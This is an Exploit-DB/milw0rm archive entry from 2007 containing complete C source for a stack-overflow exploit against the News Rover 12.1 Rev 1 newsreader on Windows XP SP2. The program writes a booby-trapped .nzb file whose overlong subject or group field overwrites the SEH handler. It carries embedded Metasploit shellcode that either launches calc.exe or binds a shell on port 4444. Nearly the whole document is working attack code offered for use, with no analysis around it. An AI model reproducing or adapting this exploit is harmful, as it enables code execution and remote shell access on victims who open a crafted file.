News Rover 12.1 Rev 1 - Stack Overflow (1)

EDB-ID:

3342


Author:

Marsu

Type:

local


Platform:

Windows

Date:

2007-02-20


/*********************************************************************************************\
*                                                                                             *
*                    News Rover 12.1 Rev 1 Remote Stack Overflow exploit                      *
*                 Coded and discovered by Marsu <MarsupilamiPowa@hotmail.fr>                  *
*                                                                                             *
*             Note: thx aux Bananas et a la KryptonIT. Bon courage aux inuITs :P              *
\*********************************************************************************************/

#include "stdlib.h"
#include "stdio.h"
#include "string.h"


/* win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
/* BAD CHARS ARE 0x00 0x3c 0x3d 0x3e 0x3f 0x0a 0x0d 0x22 0x25 0x26 0xA7 0x8a. Maybe more... */
char calcshellcode[] =
"\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa4"
"\xb2\x82\x70\x83\xeb\xfc\xe2\xf4\x58\x5a\xc6\x70\xa4\xb2\x09\x35"
"\x98\x39\xfe\x75\xdc\xb3\x6d\xfb\xeb\xaa\x09\x2f\x84\xb3\x69\x39"
"\x2f\x86\x09\x71\x4a\x83\x42\xe9\x08\x36\x42\x04\xa3\x73\x48\x7d"
"\xa5\x70\x69\x84\x9f\xe6\xa6\x74\xd1\x57\x09\x2f\x80\xb3\x69\x16"
"\x2f\xbe\xc9\xfb\xfb\xae\x83\x9b\x2f\xae\x09\x71\x4f\x3b\xde\x54"
"\xa0\x71\xb3\xb0\xc0\x39\xc2\x40\x21\x72\xfa\x7c\x2f\xf2\x8e\xfb"
"\xd4\xae\x2f\xfb\xcc\xba\x69\x79\x2f\x32\x32\x70\xa4\xb2\x09\x18"
"\x98\xed\xb3\x86\xc4\xe4\x0b\x88\x27\x72\xf9\x20\xcc\x42\x08\x74"
"\xfb\xda\x1a\x8e\x2e\xbc\xd5\x8f\x43\xd1\xe3\x1c\xc7\x9c\xe7\x08"
"\xc1\xb2\x82\x70";
 
/* win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
char bindshellcode[] =
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xf7"
"\x82\xf8\x80\x83\xeb\xfc\xe2\xf4\x0b\xe8\x13\xcd\x1f\x7b\x07\x7f"
"\x08\xe2\x73\xec\xd3\xa6\x73\xc5\xcb\x09\x84\x85\x8f\x83\x17\x0b"
"\xb8\x9a\x73\xdf\xd7\x83\x13\xc9\x7c\xb6\x73\x81\x19\xb3\x38\x19"
"\x5b\x06\x38\xf4\xf0\x43\x32\x8d\xf6\x40\x13\x74\xcc\xd6\xdc\xa8"
"\x82\x67\x73\xdf\xd3\x83\x13\xe6\x7c\x8e\xb3\x0b\xa8\x9e\xf9\x6b"
"\xf4\xae\x73\x09\x9b\xa6\xe4\xe1\x34\xb3\x23\xe4\x7c\xc1\xc8\x0b"
"\xb7\x8e\x73\xf0\xeb\x2f\x73\xc0\xff\xdc\x90\x0e\xb9\x8c\x14\xd0"
"\x08\x54\x9e\xd3\x91\xea\xcb\xb2\x9f\xf5\x8b\xb2\xa8\xd6\x07\x50"
"\x9f\x49\x15\x7c\xcc\xd2\x07\x56\xa8\x0b\x1d\xe6\x76\x6f\xf0\x82"
"\xa2\xe8\xfa\x7f\x27\xea\x21\x89\x02\x2f\xaf\x7f\x21\xd1\xab\xd3"
"\xa4\xd1\xbb\xd3\xb4\xd1\x07\x50\x91\xea\xe9\xdc\x91\xd1\x71\x61"
"\x62\xea\x5c\x9a\x87\x45\xaf\x7f\x21\xe8\xe8\xd1\xa2\x7d\x28\xe8"
"\x53\x2f\xd6\x69\xa0\x7d\x2e\xd3\xa2\x7d\x28\xe8\x12\xcb\x7e\xc9"
"\xa0\x7d\x2e\xd0\xa3\xd6\xad\x7f\x27\x11\x90\x67\x8e\x44\x81\xd7"
"\x08\x54\xad\x7f\x27\xe4\x92\xe4\x91\xea\x9b\xed\x7e\x67\x92\xd0"
"\xae\xab\x34\x09\x10\xe8\xbc\x09\x15\xb3\x38\x73\x5d\x7c\xba\xad"
"\x09\xc0\xd4\x13\x7a\xf8\xc0\x2b\x5c\x29\x90\xf2\x09\x31\xee\x7f"
"\x82\xc6\x07\x56\xac\xd5\xaa\xd1\xa6\xd3\x92\x81\xa6\xd3\xad\xd1"
"\x08\x52\x90\x2d\x2e\x87\x36\xd3\x08\x54\x92\x7f\x08\xb5\x07\x50"
"\x7c\xd5\x04\x03\x33\xe6\x07\x56\xa5\x7d\x28\xe8\x07\x08\xfc\xdf"
"\xa4\x7d\x2e\x7f\x27\x82\xf8\x80";




char nzbheader[]="<?xml version=\"1.0\" encoding=\"iso-8859-1\" ?>\n"
				 "<!DOCTYPE nzb PUBLIC \"-//newzBin//DTD NZB 1.0//EN\" \"http://www.newzbin.com/DTD/nzb/nzb-1.0.dtd\">\n"
				 "<!-- NZB Generated by MarsupilamiPowa -->\n"
				 "<nzb xmlns=\"http://www.google.com\">\n\n";


char nzbend[]="</segment>\n"
"</segments>\n"
"</file>\n"
"</nzb>\n";

char defaultfilename[]="file.nzb";

int main(int argc, char* argv[]) {

FILE *file;
char * pad;
int type=0;
int mode=0;
char *filename;
char *myshell;

printf("[+] NZB exploit for News Rover\n");
printf("[+] Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>\n");
if (argc>3)	{
	type=atoi(argv[1]);
	filename=argv[3];
	mode=atoi(argv[2]);
	if (!mode)
		myshell=calcshellcode;
	else
		myshell=bindshellcode;
}
else {
	printf("[+] Usage: %s type mode file.nzb\n\n",argv[0]);
	printf("[+] type is ...\n");
	printf("0: News Rover v12.1,  Rev. 1 Subject stack overflow. Works on XP SP2 FR\n");
	printf("1: News Rover v12.1,  Rev. 1 Group stack overflow. Works on XP SP2 FR\n\n");
	printf("[+] mode is \n");
	printf("0: Spawns calc.exe\n");
	printf("1: Binds to 4444\n\n");
	printf("[+] Ex: %s 0 0 file.nzb",argv[0]);

	return 0;
}

file=fopen(filename,"wb");

if (type==0)
{
	fprintf(file,nzbheader);
	fprintf(file,"<file poster=\"Poster\" date=\"1170609233\"\nsubject=\"");
	pad = (char*)malloc(sizeof(char)*3000+strlen(myshell));
	memset(pad,'A',3000);
	memcpy(pad+2022,"\xeb\x15\x90\x90",4);  //jmp short +15
	memcpy(pad+2026,"\x2a\x02\xfc\x7f",4);  //pop pop ret in ??? defeats SP2 SEH call protection. Have a look to your memory and change this address if it doesnt work.
	memset(pad+2030,0x90,15);				//nop padding
	memcpy(pad+2045,myshell,strlen(myshell));
	memset(pad+2045+strlen(myshell),0,1);
	memset(pad+3000,0,1);
	fprintf(file,pad);
	fprintf(file,"\">\n<groups><group>some group</group></groups>\n<segments>\n<segment bytes=\"30\" number=\"1\">some name");
	fprintf(file,nzbend);
	fclose(file);
}
else if (type==1)
{
	fprintf(file,nzbheader);
	fprintf(file,"<file poster=\"Poster\" date=\"1170609233\" subject=\"Some Subj\">\n");
	fprintf(file,"<groups><group>alt.bdffs</group></groups>\n<segments>\n<segment bytes=\"30\" number=\"1\">no matter the name</segment>\n</segments>\n</file>");
	fprintf(file,"\n\n<file poster=\"Poster\" date=\"1170609233\" subject=\"Some Subj\">\n");
	fprintf(file,"<groups><group>");
	
	pad = (char*)malloc(sizeof(char)*100);
	memset(pad,'A',100);
	memcpy(pad,"\x90\xb8\x33\x33\x33\x33\x2D\x13\x27\x33\x33\x8B\x04\x04\x40\xFF\xD0",17); //We will use data stuck in Segment to exec our code because we dont have much place here
	memcpy(pad+94,"\x53\xF1\xD1\x77\00",5); //call ebx in USER32.dll
	fprintf(file,pad);
	fprintf(file,"</group></groups>\n<segments>\n<segment bytes=\"30\" number=\"1\">");
	pad=(char *)realloc(pad,sizeof(char)*3000);
	memset(pad,'A',3000);
	memcpy(pad+1500,myshell,strlen(myshell));
	memset(pad+3000,0,1);
	fprintf(file,pad);
	fprintf(file,nzbend);
	fclose(file);
}


printf("[+] File generated! Have fun\n");
return 0;
}

// milw0rm.com [2007-02-20]